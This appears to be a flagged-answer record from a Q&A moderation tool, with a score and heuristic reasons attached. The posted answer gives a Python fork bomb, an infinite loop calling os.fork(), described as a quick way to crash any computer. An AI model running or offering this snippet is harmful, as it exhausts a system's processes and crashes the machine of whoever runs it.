79791170

Date: 2025-10-15 12:39:46
Score: 1.5
Natty:
Report link

I'm not going to ask why you want to do this, but here's a quick way to crash any given computer.

import os
while True:
    os.fork()
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: andmicha